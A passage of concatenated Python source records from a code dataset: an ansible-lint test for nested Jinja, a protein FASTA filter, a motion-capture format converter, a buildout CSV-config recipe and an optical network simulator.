False\n","sub_path":"TTHAnalysis/python/analyzers/ttHFastLepSkimmer.py","file_name":"ttHFastLepSkimmer.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"182931202","text":"# -*- coding: utf-8 -*-\n# Author: Adrián Tóth \n#\n# Copyright (c) 2020, Red Hat, Inc.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies 
or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nfrom collections import namedtuple\n\nimport pytest\n\nfrom ansiblelint.runner import Runner\n\nPlayFile = namedtuple('PlayFile', ['name', 'content'])\n\n\nFAIL_TASK_1LN = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: one-level nesting\n set_fact:\n var_one: \"2*(1+2) is {{ 2 * {{ 1 + 2 }} }}\"\n''')\n\nFAIL_TASK_1LN_M = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: one-level multiline nesting\n set_fact:\n var_one_ml: >\n 2*(1+2) is {{ 2 *\n {{ 1 + 2 }}\n }}\n''')\n\nFAIL_TASK_2LN = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: two-level nesting\n set_fact:\n var_two: \"2*(1+(3-1)) is {{ 2 * {{ 1 + {{ 3 - 1 }} }} }}\"\n''')\n\nFAIL_TASK_2LN_M = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: two-level multiline nesting\n set_fact:\n var_two_ml: >\n 2*(1+(3-1)) is {{ 2 *\n {{ 1 +\n {{ 3 - 1 }}\n }} }}\n''')\n\nFAIL_TASK_W_5LN = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: five-level wild nesting\n set_fact:\n var_three_wld: \"{{ {{ {{ {{ {{ 234 }} }} }} }} }}\"\n''')\n\nFAIL_TASK_W_5LN_M = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: five-level wild multiline nesting\n set_fact:\n var_three_wld_ml: >\n {{\n {{\n {{\n {{\n {{ 234 }}\n }}\n }}\n }}\n }}\n''')\n\nSUCCESS_TASK_P = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: non-nested example\n set_fact:\n var_one: \"number for 'one' is {{ 2 * 1 }}\"\n''')\n\nSUCCESS_TASK_P_M = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: multiline non-nested example\n set_fact:\n var_one_ml: >\n number for 'one' is {{\n 2 * 1 }}\n''')\n\nSUCCESS_TASK_2P = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: nesting far from each other\n set_fact:\n var_two: \"number for 'two' is {{ 2 * 1 }} and number for 'three' is {{ 4 - 1 }}\"\n''')\n\nSUCCESS_TASK_2P_M = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: multiline nesting far from each other\n set_fact:\n var_two_ml: >\n number for 'two' is {{ 2 * 1\n }} and number for 'three' is {{\n 4 - 1 }}\n''')\n\nSUCCESS_TASK_C_2P = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: nesting close to each other\n set_fact:\n var_three: \"number for 'ten' is {{ 2 - 1 }}{{ 3 - 3 }}\"\n''')\n\nSUCCESS_TASK_C_2P_M = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: multiline nesting close to each other\n set_fact:\n var_three_ml: >\n number for 'ten' is {{\n 2 - 1\n }}{{ 3 - 3 }}\n''')\n\n\n@pytest.fixture\ndef runner(tmp_path, default_rules_collection):\n return Runner(\n default_rules_collection,\n str(tmp_path / 'playbook.yml'),\n [], [], [],\n )\n\n\n@pytest.fixture\ndef _playbook_file(tmp_path, request):\n if request.param is None:\n return\n for play_file in request.param:\n p = tmp_path / play_file.name\n p.write_text(play_file.content)\n\n\n@pytest.mark.parametrize(\n '_playbook_file',\n (\n pytest.param([FAIL_TASK_1LN], id='file includes one-level nesting'),\n pytest.param([FAIL_TASK_1LN_M], id='file includes one-level 
multiline nesting'),\n pytest.param([FAIL_TASK_2LN], id='file includes two-level nesting'),\n pytest.param([FAIL_TASK_2LN_M], id='file includes two-level multiline nesting'),\n pytest.param([FAIL_TASK_W_5LN], id='file includes five-level wild nesting'),\n pytest.param([FAIL_TASK_W_5LN_M], id='file includes five-level wild multiline nesting'),\n ),\n indirect=['_playbook_file'],\n)\n@pytest.mark.usefixtures('_playbook_file')\ndef test_including_wrong_nested_jinja(runner):\n rule_violations = runner.run()\n assert rule_violations[0].rule.id == '207'\n\n\n@pytest.mark.parametrize(\n '_playbook_file',\n (\n pytest.param([SUCCESS_TASK_P], id='file includes non-nested example'),\n pytest.param([SUCCESS_TASK_P_M], id='file includes multiline non-nested example'),\n pytest.param([SUCCESS_TASK_2P], id='file includes nesting far from each other'),\n pytest.param([SUCCESS_TASK_2P_M], id='file includes multiline nesting far from each other'),\n pytest.param([SUCCESS_TASK_C_2P], id='file includes nesting close to each other'),\n pytest.param(\n [SUCCESS_TASK_C_2P_M],\n id='file includes multiline nesting close to each other',\n ),\n ),\n indirect=['_playbook_file'],\n)\n@pytest.mark.usefixtures('_playbook_file')\ndef test_including_proper_nested_jinja(runner):\n rule_violations = runner.run()\n assert not rule_violations\n","sub_path":"test/TestNestedJinjaRule.py","file_name":"TestNestedJinjaRule.py","file_ext":"py","file_size_in_byte":5931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"82064193","text":"#!/usr/bin/env python\n# Parse input report\n# Input file is a report from http://cello.life.nctu.edu.tw\n\n# Select all GIs from Extracellular records\n# \n# Build a FASTA record of all Mouse Proteins with those GIs\n\nfrom Bio import SeqIO\n\n#input_file_name = \"sample-input.txt\"\ninput_file_name = \"full-input.txt\" # Real input\n\n# Store all mouse protein records in a Dict indexed on gi number\nmice = {}\nfor seq_record in SeqIO.parse(\"mouse.fasta\", \"fasta\"):\n\t\tmice[seq_record.id.split('|')[1]] = seq_record\n\noutfile = open(\"output.fasta\",\"w\")\n\nwith open(input_file_name, \"r\") as infile:\n\tfor line in infile:\n\t\tif line.startswith(\"SeqID\"):\n\t\t\t# new record, store its GI number, but only keep if it's \"Extracellular\"\n\t\t\tgi = line.split('|')[1]\n\t\telse:\n\t\t\t# lines we want look like this:\n\t\t\t# \t Extracellular\t 2.632 *\n\t\t\t# three white-space-delimited columns, with \"Extracellular\" in the first \n\t\t\t# column, and \"*\" in the third, last column\n\t\t\tcols = line.split()\t\n\t\t\tif len(cols) > 2 and cols[0] == \"Extracellular\" and cols[2] == \"*\":\n\t\t\t\t# Print FASTA records only for those GI's whose CELLO records are \n\t\t\t\t# \"Extracellular\"\n\t\t\t\tSeqIO.write(mice[gi], outfile, \"fasta\")\n","sub_path":"cello-parse.py","file_name":"cello-parse.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"186581622","text":"import glob, os, sys\r\n\r\ndef usuage(scriptName):\r\n print('Usage: %s [src_amc_dir] [dest_bvh_dir]'%scriptName)\r\n\r\ndef makeListFiles(asfFilePaths, amcFilePaths, bvhFilePaths):\r\n list_asf = open('list_asf.txt', 'w')\r\n list_amc = open('list_amc.txt', 'w')\r\n list_bvh = open('list_bvh.txt', 'w')\r\n \r\n for path in asfFilePaths:\r\n list_asf.write(path+'\\n')\r\n for path in amcFilePaths:\r\n list_amc.write(path+'\\n')\r\n for path in bvhFilePaths:\r\n 
list_bvh.write(path+'\\n')\r\n \r\n list_asf.close()\r\n list_amc.close()\r\n list_bvh.close()\r\n \r\ndef removeListFiles():\r\n os.remove('list_asf.txt')\r\n os.remove('list_amc.txt')\r\n os.remove('list_bvh.txt')\r\n \r\ndef readBvhJointNames(bvhFilePath):\r\n jointNames = []\r\n f = open(bvhFilePath)\r\n for line in f:\r\n tokens = line.split()\r\n if tokens[0] == 'ROOT' or tokens[0] == 'JOINT':\r\n jointNames.append(tokens[1])\r\n if tokens[0] == 'MOTION':\r\n break\r\n return jointNames\r\n \r\ndef readAsfBoneNames(asfFilePath):\r\n boneNames = []\r\n f = open(asfFilePath)\r\n for line in f:\r\n tokens = line.split()\r\n if tokens[0] == 'name':\r\n boneNames.append(tokens[1])\r\n return boneNames \r\n \r\ndef getDefaultChangeMap(asfBoneNames):\r\n changeMap = {}\r\n for boneNames in asfBoneNames:\r\n changeMap[boneNames.lower()] = boneNames\r\n return changeMap\r\n\r\n# changeMap[oldJointName] = newJointName\r\ndef changeBvhJointNamesInFile(bvhFilePath, changeMap):\r\n f = open(bvhFilePath, 'r')\r\n oldLines = f.readlines()\r\n f.close()\r\n \r\n newLines = [None]*len(oldLines)\r\n for i in range(len(oldLines)):\r\n oldLine = oldLines[i]\r\n tokens = oldLine.split()\r\n if tokens[0] == 'ROOT' or tokens[0] == 'JOINT':\r\n oldJointName = tokens[1]\r\n if oldJointName in changeMap:\r\n newJointName = changeMap[oldJointName]\r\n newLine = oldLine.replace(oldJointName, newJointName)\r\n newLines[i] = newLine\r\n else:\r\n newLines[i] = oldLine\r\n else:\r\n newLines[i] = oldLine\r\n\r\n f = open(bvhFilePath, 'w')\r\n f.writelines(newLines)\r\n f.close()\r\n\r\ndef convertAmc2Bvh(amcDir, bvhDir):\r\n asfFilePath = glob.glob(amcDir+'/*.asf')[0]\r\n print('asf:', asfFilePath)\r\n print()\r\n \r\n amcFilePaths = glob.glob(amcDir+'/*.amc')\r\n bvhFilePaths = []\r\n asfFilePaths = [] \r\n \r\n print('amc:')\r\n for i in range(len(amcFilePaths)):\r\n amcPath = amcFilePaths[i]\r\n print('[%d] %s'%(i, amcPath))\r\n \r\n amcFileName = os.path.basename(amcPath)\r\n fileName = os.path.splitext(amcFileName)[0]\r\n \r\n bvhFileName = fileName + '.bvh'\r\n bvhFilePath = bvhDir + '/' + bvhFileName\r\n bvhFilePaths.append(bvhFilePath)\r\n \r\n asfFilePaths.append(asfFilePath)\r\n print()\r\n \r\n makeListFiles(asfFilePaths, amcFilePaths, bvhFilePaths)\r\n os.system('Amc2Bvh.exe')\r\n removeListFiles()\r\n \r\n changeMap = getDefaultChangeMap(readAsfBoneNames(asfFilePath))\r\n changeMap['hip'] = 'Hips'\r\n changeMap['head'] = 'Head'\r\n \r\n print('bvh:')\r\n for i in range(len(amcFilePaths)):\r\n bvhPath = bvhFilePaths[i] \r\n changeBvhJointNamesInFile(bvhPath, changeMap)\r\n print('[%d] %s'%(i, bvhPath))\r\n print()\r\n \r\n print('Done')\r\n\r\n\r\nif __name__ == '__main__':\r\n if len(sys.argv) > 3:\r\n usuage(os.path.basename(sys.argv[0]))\r\n else:\r\n if len(sys.argv) == 1:\r\n srcDir = '.'\r\n destDir = srcDir\r\n elif len(sys.argv) == 2:\r\n srcDir = sys.argv[1]\r\n destDir = srcDir\r\n elif len(sys.argv) == 3:\r\n srcDir = sys.argv[1]\r\n destDir = sys.argv[2]\r\n \r\n convertAmc2Bvh(srcDir, destDir)\r\n","sub_path":"PyCommon/modules/Tools/Amc2BvhEx.py","file_name":"Amc2BvhEx.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"406080636","text":"# -*- coding: utf-8 -*-\n\"\"\"Recipe csvconfig\"\"\"\nimport re\nimport csv\nimport os.path\nimport zc.buildout.buildout\nimport pprint\nfrom zc.buildout.buildout import Options\nimport configparser\nimport logging\n \n \n\n\n\nclass Recipe(object):\n 
\"\"\"zc.buildout recipe\"\"\"\n def read_csvconfig(self,file):\n aReader = csv.reader(open(file))\n for index,row in enumerate(aReader):\n #print ' : '.join(row)\n if index == 0: #first row holds the variable names\n for var in row:\n self.vars.append(var.strip())\n continue\n d = {}\n for i, var in enumerate(row):\n d[self.vars[i]] = var.strip()\n self.lines.append(d)\n\n def multikeydict(self,keys, lines):\n \"\"\"generate a dict with 'keys' (list of variables names) as index key\n the value part of this dict is a list of dict that holds the values for\n the different columns\"\"\"\n newdict = {}\n\n for line in lines:\n newkey_value = []\n newkey = ''\n for key in keys:\n newkey_value.append(line[key])\n newkey_value.sort()\n newkey = ','.join(newkey_value)\n if newkey:\n if newkey not in newdict.keys():\n newdict[newkey] = []\n newdict[newkey].append(line)\n return newdict\n \n \n def checkkey(self,word):\n \"\"\"check either on the left part of an option or on a section if there is, or are\n keys => returns a list of keys or an empty list if nothing\"\"\"\n match = self.c_re.search(word)\n i = 0\n keylist = []\n while match:\n #print match.group()\n #import pdb; pdb.set_trace()\n var = match.group(1)\n to_replace = match.group(0)\n length = len(to_replace) + 1\n #import pdb; pdb.set_trace()\n if var in self.vars:\n keylist.append(var)\n i = match.pos + length\n match = self.c_re.search(word, i)\n #print \"checkkey : \", keylist\n return keylist\n \n\n def expandvar(self, word, line):\n \"\"\"expand variables if found in vars according to dict 'line'\n returns word with var subsitution when possible\n rule is that if there's a variable in word and line as an empty result\n for this variable, then the returned word is set to ''\n the same is true if for all variable of a word line provides an empty result\n \"\"\"\n match = self.c_re.search(word)\n i = 0\n nbmatch = 0\n empty = 0\n original = word[:]\n while True:\n if not match:\n break\n nbmatch += 1\n var = match.group(1)\n to_replace = match.group(0)\n length = len(to_replace) + 1\n #import pdb; pdb.set_trace()\n if var in self.vars:\n if line[var] == '':\n empty += 1\n word = word.replace(to_replace,line[var])\n length = len(line[var]) + 1\n i = match.pos + length\n match = self.c_re.search(word, i)\n #print \"expandvar : \", word, self.vars\n if nbmatch and nbmatch == empty:\n #import pdb; pdb.set_trace()\n return ''\n return word\n\n \n def expandsection(self,section,config,buildout,keylist,dictlist):\n \"\"\"expand section with variables\"\"\"\n newsection = self.expandvar(section,dictlist[0])\n if not buildout.has_section(newsection):\n buildout.add_section(newsection)\n for option in config.options(section):\n #import pdb; pdb.set_trace()\n opt = config.get(section, option)\n match = self.c_re.search(option)\n if match: #option name contains a variable\n newkeys = self.checkkey(option)\n keydict = self.multikeydict(newkeys,dictlist)\n for key in keydict.keys():\n buildout = self.expandoption(option,opt,newsection,buildout,keydict[key])\n else:#eventually right-part contains a variable\n buildout = self.expandoption(option,opt,newsection,buildout,dictlist)\n return buildout\n \n def expandoption(self,option,optionvalue,section,buildout,dictlist):\n \"\"\"expand section with variables\"\"\"\n newoption = self.expandvar(option,dictlist[0])\n if not buildout.has_section(section):\n buildout.add_section(section)\n newopts = []\n for line in dictlist:\n #import pdb; pdb.set_trace()\n newopt = self.expandvar(optionvalue, line)\n if 
newopt not in newopts:\n newopts.append(newopt)\n newoptionvalue = '\\n\\t'.join(newopts)\n buildout.set(section, newoption, newoptionvalue)\n return buildout\n \n\n def expandall_on_section(self, config, buildout, section):\n \"\"\"apply all vars on a section\"\"\"\n # first expand section name if necessary\n match = self.c_re.search(section)\n if match:\n newkeys = self.checkkey(section)\n keydict = self.multikeydict(newkeys,self.lines)\n #import pdb; pdb.set_trace()\n for key in keydict.keys():\n buildout = self.expandsection(section,config,buildout,key,keydict[key])\n \n else:\n buildout = self.expandsection(section,config,buildout,self.vars,self.lines)\n return buildout \n\n def apply_variables(self,template,target):\n \"\"\" apply variables in template and save it as new config file in target\n \"\"\"\n \n config = configparser.ConfigParser(delimiters=('=', '+=', '-='))\n newconfig = configparser.ConfigParser(delimiters=('=', '+=', '-='))\n config.read(template)\n #import pdb; pdb.set_trace()\n # first read sections to find variables in vars\n # newconfig.sections = dict(config.sections)\n #import pdb; pdb.set_trace()\n for sect in config.sections():\n newconfig = self.expandall_on_section(config, newconfig, sect)\n #import pdb; pdb.set_trace()\n with open(target, 'wb+') as configfile:\n newconfig.write(configfile) \n \n\n def __init__(self, buildout, name, options):\n self.buildout, self.name, self.options = buildout, name, options\n self.csvfile = self.options.pop('csvfile', name).strip().split()\n self.templates = self.options.pop('templates', name).strip().split()\n self.lines = [] \n self.vars = []\n self.c_re = re.compile(r'\\$\\$\\{([^:|}]*)\\}')\n #self.c_re = re.compile(r'\\$\\${(.*?)}')\n \n #template name may come under the form \"filepath:target\" both being relative path from \n #buildout-dir\n #if no \":\" is found default target applied is buildout-dir with same filename as template\n # minus the \".in\" extension\n def parse_template(self,template):\n if ':' in template:\n template, target = template.split(':')\n target = os.path.join(\n self.buildout['buildout']['directory'],\n target,\n )\n\n else:\n target = template.split('/')[-1][0:-3]\n return template.strip(), target.strip()\n\n\n\n def install(self):\n \"\"\"Installer\"\"\"\n # XXX Implement recipe functionality here\n\n # Return files that were created by the recipe. 
The buildout\n # will remove all returned files upon reinstall.\n ret = []\n new_sections = []\n for file in self.csvfile:\n self.read_csvconfig(file)\n for template, target in (self.parse_template(template) for template in self.templates):\n self.apply_variables(template,target)\n logging.getLogger(self.name).info(\n 'Creating config file : %s', target)\n ret.append(target)\n return tuple(ret)\n\n def update(self):\n \"\"\"Updater\"\"\"\n return self.install()\n","sub_path":"build/lib/ageliaco/recipe/csvconfig/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"209680816","text":"import itertools\nimport json\nimport matplotlib\nfrom scipy import special as math\nimport random\n\nimport numpy as np\nimport pandas as pd\n\nmatplotlib.use('TkAgg') # comment\nimport matplotlib.pyplot as plt\n\nfrom scipy.constants import c, h, pi\nfrom random import shuffle\n\nBER_t = 1e-3\nBn = 12.5e9 # banda rumore\n\n\nclass Lightpath(object): # Lab5 definita nuova classe\n def __init__(self, power, path, channel):\n self._sig_power = power\n self._path = path\n self._channel = channel\n self._noise_power = 0\n self._latency = 0\n self.Rs = 32.0e9 # Lab8\n self.df = 50.0e9\n\n @property\n def signal_power(self):\n return self._sig_power\n\n def set_signal_power(self, value):\n self._sig_power = value\n\n @property\n def path(self):\n return self._path\n\n @path.setter\n def path(self, value):\n self._path = value\n\n @property\n def channel(self):\n return self._channel\n\n @property\n def noise_power(self):\n return self._noise_power\n\n @noise_power.setter\n def noise_power(self, value):\n self._noise_power = value\n\n @property\n def latency(self):\n return self._latency\n\n @latency.setter\n def latency(self, value):\n self._latency = value\n\n def add_noise(self, value):\n self.noise_power += value\n\n def add_latency(self, value):\n self.latency += value\n\n def next(self):\n self.path = self.path[1:]\n\n\nclass SignalInformation(Lightpath):\n def __init__(self, power, path):\n # super().__init__(power, path, 0)\n self._signal_power = power\n self._path = path\n self._noise_power = 0\n self._latency = 0\n self.Rs = 32.0e9 # Lab8\n self.df = 50.0e9\n\n @property\n def signal_power(self):\n return self._signal_power\n\n @property\n def path(self):\n return self._path\n\n @path.setter\n def path(self, path):\n self._path = path\n\n @property\n def noise_power(self):\n return self._noise_power\n\n @noise_power.setter\n def noise_power(self, noise):\n self._noise_power = noise\n\n @property\n def latency(self):\n return self._latency\n\n @latency.setter\n def latency(self, latency):\n self._latency = latency\n\n def add_noise(self, noise):\n self._noise_power += noise\n\n def add_latency(self, latency):\n self._latency += latency\n\n def next(self):\n self.path = self.path[1:]\n\n\n################################### CLASS LINE ###########################################\n\nclass Line(object):\n\n def __init__(self, line_dict):\n self._label = line_dict['label']\n self._lenght = line_dict['lenght']\n self._state = ['free'] * 10 # Lab5 trasformato il campo in vettore\n self._successive = {} # Node\n self._n_amplifiers = int((self._lenght / 80e3)) # added the successives 3 parameters\n self._gain = 16\n self._noise_figure = 3\n\n # Pysical parameters of the fiber\n # Added from 3rd point lab8\n self._alpha = 0.2e-3\n self._beta = 2.13e-26\n self._gamma = 1.27e-3\n self._rs = 
32e9\n self._df = 50e9\n\n @property\n def label(self):\n return self._label\n\n @property\n def lenght(self):\n return self._lenght\n\n @property # Lab4\n def state(self):\n return self._state\n\n @state.setter\n def state(self, state):\n # state = state.lower().strip()\n state = [s.lower().strip() for s in state] # aggiunta in Lab5\n # if state in ['free', 'occupied']:vecchia condizione\n if set(state).issubset(set(['free', 'occupied'])): # Modifica Lab5, dovuto da aggiornamento a vettore\n self._state = state\n else:\n print('ERROR: line state not recognized.Value:', set(state) - set(['free', 'occupied'])) # aggiunta a Lab5\n # print('ERROR: line state not recognized.Value:', state) vecchia condizione\n\n @property\n def successive(self):\n return self._successive\n\n @successive.setter\n def successive(self, successive):\n self._successive = successive\n\n def latency_generation(self):\n latency = self._lenght / (c * 2 / 3)\n return latency\n\n # def noise_generation(self, signal_power): Old method\n # noise = signal_power / (2 * self._lenght)\n # return noise\n\n def noise_generation(self, lightpath): # Lab9 method\n # noise = 0.000000001 * signal_power * self._length # 1e-9 * s_p * length\n noise = self.ase_generation() + self.nli_generation(lightpath.signal_power, lightpath.df, lightpath.Rs)\n return noise\n\n @property\n def n_amplifiers(self):\n return self._n_amplifiers\n\n @property\n def span_length(self):\n return self._span_length\n\n @property\n def gain(self):\n return self._gain\n\n @gain.setter\n def gain(self, gain):\n self._gain = gain\n\n @property\n def noise_figure(self):\n return self._noise_figure\n\n @property\n def alpha(self):\n return self._alpha\n\n @property\n def beta(self):\n return self._beta\n\n @property\n def gamma(self):\n return self._gamma\n\n @property\n def rs(self):\n return self._rs\n\n @property\n def df(self):\n return self._df\n\n def free_state(self): # Lab9\n self._state = ['free'] * 10\n\n def propagate(self, lightpath, occupation=False): # sostituito SignalInformation con Lightpath Lab5\n # latency\n latency = self.latency_generation()\n lightpath.add_latency(latency)\n\n # noise old method\n # signal_power = lightpath.signal_power\n sp = self.optimized_launch_power(self.eta_nli(lightpath.df, lightpath.Rs)) # Lab9 adjust\n lightpath.set_signal_power(sp) # same as up\n noise = self.noise_generation(lightpath)\n lightpath.add_noise(noise)\n\n # state\n if occupation: # Condizione aggiornata da Lab5\n channel = lightpath.channel\n new_state = list(self.state)\n new_state[channel] = 'occupied'\n self.state = new_state\n\n node = self.successive[lightpath.path[0]]\n lightpath = node.propagate(lightpath, occupation)\n return lightpath\n\n def ase_generation(self):\n gain_lin = 10 ** (self._gain / 10)\n noise_figure_lin = 10 ** (self._noise_figure / 10)\n N = self._n_amplifiers\n f = 193.4e12\n # h = Planck\n Bn = 12.5e9\n ase_noise = N * h * f * Bn * noise_figure_lin * (gain_lin - 1)\n return ase_noise\n\n # last point of lab8\n # all clear until now\n def nli_generation(self, signal_power, dfp, Rsp):\n Bn = 12.5e9 # GHz\n eta_nli = self.eta_nli(dfp, Rsp)\n nli = (signal_power ** 3) * eta_nli * self._n_amplifiers * Bn\n return nli\n\n # need to find this formula\n def eta_nli(self, dfp, Rsp):\n df = dfp\n Rs = Rsp\n a = self.alpha / (20 * np.log10(np.e))\n Nch = 10\n b2 = self.beta\n e_nli = 16 / (27 * np.pi) * np.log(\n np.pi ** 2 * b2 * Rs ** 2 * Nch ** (2 * Rs / df) / (2 * a)) * self.gamma ** 2 / (\n 4 * a * b2 * Rs ** 3)\n\n return e_nli\n\n 
def optimized_launch_power(self, eta): # Lab9 2nd point\n F = 10 ** (self.noise_figure / 10)\n G = 10 ** (self.gain / 10)\n f0 = 193.414e12\n olp = ((F * f0 * h * G) / (2 * eta)) ** (1 / 3)\n return olp\n\n\n#################################### CLASS NODE ###############################################\n\nclass Node(object):\n def __init__(self, node_dict):\n self._label = node_dict['label']\n self._position = node_dict['position']\n self._connected_nodes = node_dict['connected_nodes']\n self._successive = {}\n self._switching_matrix = None # Lab6 added attribute property and setter\n self._transceiver = '' # Lab7 es 2\n\n @property\n def label(self):\n return self._label\n\n @property\n def position(self):\n return self._position\n\n @property\n def connected_nodes(self):\n return self._connected_nodes\n\n @property\n def successive(self):\n return self._successive\n\n @successive.setter\n def successive(self, successive):\n self._successive = successive\n\n @property\n def switching_matrix(self):\n return self._switching_matrix\n\n @switching_matrix.setter\n def switching_matrix(self, value):\n self._switching_matrix = value\n\n @property\n def transceiver(self):\n return self._transceiver\n\n @transceiver.setter\n def transceiver(self, transceiver):\n self._transceiver = transceiver\n\n def propagate(self, lightpath, occupation=False):\n path = lightpath.path\n if len(path) > 1:\n line_label = path[:2]\n line = self.successive[line_label]\n lightpath.next()\n lightpath = line.propagate(lightpath, occupation) # Lab5 aggiornato lightpath al posto di signalinformation\n\n return lightpath\n\n\n######################## CLASS NETWORK ###########################################\n\nclass Network(object):\n def __init__(self, json_path, transceiver='fixed_rate'):\n self._nodes = {}\n self._lines = {}\n self._connected = False # Lab4\n self._weighted_paths = None # Lab4\n self._route_space = None # Lab5\n\n node_json = json.load(open(json_path, 'r'))\n for node_label in node_json:\n # create nodes\n node_dict = node_json[node_label]\n node_dict['label'] = node_label\n node = Node(node_dict)\n self._nodes[node_label] = node\n\n # Lab 7\n if 'transceiver' not in node_json[node_label].keys():\n node.transceiver = transceiver\n else:\n node.transceiver = node_json[node_label]['transceiver']\n\n # create lines\n for connected_node_label in node_dict['connected_nodes']:\n line_dict = {}\n line_label = node_label + connected_node_label\n line_dict['label'] = line_label\n node_position = np.array(node_json[node_label]['position'])\n connected_node_position = np.array(node_json[connected_node_label]['position'])\n line_dict['lenght'] = np.sqrt(np.sum(node_position - connected_node_position) ** 2)\n line = Line(line_dict)\n self._lines[line_label] = line\n\n @property\n def nodes(self):\n return self._nodes\n\n @property\n def lines(self):\n return self._lines\n\n @property\n def connected(self):\n return self._connected\n\n def draw(self):\n nodes = self.nodes\n for node_label in nodes:\n n0 = nodes[node_label]\n x0 = n0.position[0] / 1e3\n y0 = n0.position[1] / 1e3\n plt.plot(x0, y0, 'go', markersize=10)\n plt.text(x0, y0, node_label)\n for connected_node_label in n0.connected_nodes:\n n1 = nodes[connected_node_label]\n x1 = n1.position[0] / 1e3\n y1 = n1.position[1] / 1e3\n plt.plot([x0, x1], [y0, y1], 'b')\n plt.xlabel('Km')\n plt.title('Network')\n plt.show()\n\n def find_paths(self, label1, label2):\n cross_nodes = [key for key in self.nodes.keys() if ((key != label1) & (key != label2))]\n 
cross_lines = self.lines.keys()\n inner_paths = {}\n inner_paths['0'] = label1\n for i in range(len(cross_nodes) + 1):\n inner_paths[str(i + 1)] = []\n for inner_path in inner_paths[str(i)]:\n inner_paths[str(i + 1)] += [\n inner_path + cross_node\n for cross_node in cross_nodes\n if ((inner_path[-1] + cross_node in cross_lines) &\n (cross_node not in inner_path))]\n\n paths = []\n for i in range(len(cross_nodes) + 1):\n for path in inner_paths[str(i)]:\n if path[-1] + label2 in cross_lines:\n paths.append(path + label2)\n return paths\n\n # Lab9: da rivedere\n\n def free_space(self):\n states = ['free'] * len(self.route_space['path'])\n for l in self.lines.values():\n l.free_state()\n for i in range(10):\n self.route_space[str(i)] = states\n\n def connect(self): # Added switching matrix reference Lab6\n nodes_dict = self.nodes\n lines_dict = self.lines\n switching_matrix = {}\n for node_label in nodes_dict:\n node = nodes_dict[node_label]\n for connected_node in node.connected_nodes:\n inner_dict = {connected_node: np.zeros(10)}\n for connected_node2 in node.connected_nodes:\n if connected_node2 != connected_node:\n dict_tmp = {connected_node2: np.ones(10)}\n inner_dict.update(dict_tmp)\n\n switching_matrix.update({connected_node: inner_dict})\n\n line_label = node.label + connected_node\n line = lines_dict[line_label]\n line.successive[connected_node] = nodes_dict[connected_node]\n node.successive[line_label] = lines_dict[line_label]\n node.switching_matrix = switching_matrix\n switching_matrix = {}\n self._connected = True\n\n # def propagate(self,signal_information): #funzione prima di Lab5\n # path=signal_information.path\n # start_node=self.nodes[path[0]]\n # propagated_signal_information=start_node.propagate(signal_information)\n # return propagated_signal_information\n\n def propagate(self, lightpath, occupation=False): # Aggiornata a Lab5\n path = lightpath.path\n start_node = self.nodes[path[0]]\n propagated_lightpath = start_node.propagate(lightpath, occupation)\n return propagated_lightpath\n\n # Lab4\n @property\n def weighted_paths(self):\n return self._weighted_paths\n\n def set_weighted_paths(self, signal_power): # Modifica Lab5 con implementazione route space\n if not self.connected:\n self.connect()\n node_labels = self.nodes.keys()\n pairs = []\n for label1 in node_labels:\n for label2 in node_labels:\n if label1 != label2:\n pairs.append(label1 + label2)\n df = pd.DataFrame()\n paths = []\n latencies = []\n noises = []\n snrs = []\n\n for pair in pairs:\n for path in self.find_paths(pair[0], pair[1]):\n path_string = ''\n for node in path:\n path_string += node + '->'\n paths.append(path_string[:-2])\n\n # Propagation\n signal_information = SignalInformation(signal_power, path)\n if pair in self.lines.keys():\n line = self.lines[pair]\n signal_power = line.optimized_launch_power(\n line.eta_nli(signal_information.df, signal_information.Rs))\n signal_information.set_signal_power(signal_power)\n\n signal_information = self.propagate(signal_information, occupation=False)\n latencies.append(signal_information.latency)\n noises.append(signal_information.noise_power)\n snrs.append(10 * np.log10(signal_information.signal_power / signal_information.noise_power))\n\n df['path'] = paths\n df['latency'] = latencies\n df['noise'] = noises\n df['snr'] = snrs\n self._weighted_paths = df\n # Aggiunta da Lab5\n route_space = pd.DataFrame()\n route_space['path'] = paths\n for i in range(10):\n route_space[str(i)] = ['free'] * len(paths)\n self._route_space = route_space\n\n # Lab3 
